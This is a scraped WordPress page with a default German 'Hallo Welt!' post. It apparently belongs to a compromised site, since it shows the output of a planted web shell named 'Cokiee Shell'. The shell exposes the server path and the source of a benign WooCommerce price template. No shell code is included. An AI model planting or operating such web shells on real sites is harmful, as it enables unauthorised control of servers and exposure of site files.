Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/www/web284/html/wp-content/themes/splendor/woocommerce/single-product/ |
Current File : //var/www/web284/html/wp-content/themes/splendor/woocommerce/single-product/price.php |
<?php /** * Single Product Price, including microdata for SEO * * @author WooThemes * @package WooCommerce/Templates * @version 1.6.4 */ if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly global $post, $product; ?> <div itemprop="offers" itemscope itemtype="http://schema.org/Offer"> <h5 itemprop="price" class="price"><span class="oi_single_price"><?php _e( 'Price:', 'woocommerce' ); ?></span> <span class="colored"><?php echo $product->get_price_html(); ?></span></h5> <meta itemprop="priceCurrency" content="<?php echo get_woocommerce_currency(); ?>" /> <link itemprop="availability" href="http://schema.org/<?php echo $product->is_in_stock() ? 'InStock' : 'OutOfStock'; ?>" /> </div>
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare